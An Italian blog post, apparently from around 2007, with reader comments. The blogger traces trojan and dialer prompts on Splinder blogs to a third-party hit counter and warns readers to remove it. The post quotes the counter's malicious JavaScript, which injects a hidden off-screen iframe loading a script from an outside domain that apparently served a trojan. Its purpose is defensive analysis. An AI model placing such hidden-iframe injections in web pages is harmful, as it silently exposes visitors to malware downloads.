| Risolto il mistero dei dialer su splinder! | [informatica] |
Domenica avevo scritto a proposito dei troiani che cercavano di intrufolarsi sul mio povero PC mentre navigavo sulle pagine di splinder. Oggi pomeriggio, mentre guardavo che succedeva da Copiascolla, mi sono visto in diretta il troiano che voleva cambiare la mia homepage (come se io non usassi SpyBot e TeaTimer per bloccare simili richieste :-) ) Mi sono messo a dare un'occhiata a quale parte del codice inserisse il tutto: dopo avere benedetto il fatto che Firefox ti permette di scrivere view-source: e visualizzare il sorgente di una pagina web invece che la pagina stessa, ho scoperto che il colpevole era il contatore delle statistiche. Se uno guarda http://stat.superstat.info/counter.php, o almeno lo guardava quando ho provato io, avrebbe trovato questo simpatico pezzo di codice:
if ( parseInt(pr17) <= parseInt("9") && parseInt(visit17) < 2 ) {
document.write('<div style="position:absolute;left:-5000px;top:-5000px;visibility:hidden;">');
document.write('<if'+'rame frameborder="0" src="http://a1p.cgste2.won-ppp.info/htm/cc1.php?p=55&cc2=it"><'+'/iframe>' );
document.write('</div>');
};
Ho già detto che io JavaScript non lo parlo, ma credo che sia abbastanza chiaro che viene aperto un iframe che chiama appunto uno script su won-ppp.info. Ho provato a guardare le informazioni di whois per superstat.info, e ho visto che il dominio è "nascosto", o meglio registrato da domainsbyproxy.com, che afferma di essere un utile servizio perché i dati pubblici dei dominii non siano preda di spammer ma a me sembra più un sistema perché non si sappiano i dati degli spammer. L'ultimo aggiornamento del record è dello scorso ottobre: visto che Gaia mi ha detto che quel contatore ce l'ha da almeno un anno, non penso sia impossibile che il dominio sia scaduto e sia stato preso da qualcuno che usi il servizio come copertura - sì, lo so, fa tanto James Bond o il negozio di fiori dei vecchi Alan Ford, ma che ci volete fare?
Vabbè, se non avete capito nulla del pippone non è importante, visto che quello che conta :-) è solo quest'ultima riga. Se avete un contatore su superstat.info, toglietelo subito.
3 TrackBacks
Ecco i riferimenti da altri blog: Risolto il mistero dei dialer su splinder!.
URL per il TrackBack di questa notiziola: http://xmau.com/mt/mt-tb.cgi/2445
ogni tanto mi arrivano richieste di eseguire dei troiani... quando sono su Splinder. Ancora...
Seguite il suggerimento di MAU, se avete un contatore della società superstat.info, toglietelo immediatamente. Infatti tramite una serie di inclusione di frame nascosti viene tentato di scaricare il programma 2026.exe, che non è altro che un trojan. ... Ancora...
Questo post qui era da un po’ che volevo scriverlo ma accidenti accidentaccio non c’ho avuto un cavolo di tempo ultimamente. Avviso i miei cari 3 lettori (ah, no, sono aumentati, ma forse è un bluff) che trattasi di post assolutament Ancora...
Lo dicevo, io, che era il counter! (da leggersi con lo stesso tono petulante del bambino che, in un vecchio spot, diceva "per me è stato il cinese: nel suo alibi non ha tenuto conto del fuso orario" - non mi chiedere che spot fosse, però!)
Era capitato anche a me:
http://hronir.blogspot.com/2007/05/attenzione-un-dialer-e-passato-di-qui.html
:(
Era capitato anche a me, avevo provato a visualizzare il codice ma non l'avevo trovato.
Avevo pensato anch'io al contatore delle statistiche, ma poi mi sono detto che non era possibile e invece era proprio lì.
Grazie .mau.
anche io sono stato vittima di queste seccature. Peccato, perché quel servizio era ottimo. Consiglio a tutti http://www.histats.com , che utilizzo attualmente e con cui mi trovo bene (ottime interfaccie, buone statistiche ecc.).
Ciao, Vaaal
(bel blog. Sì)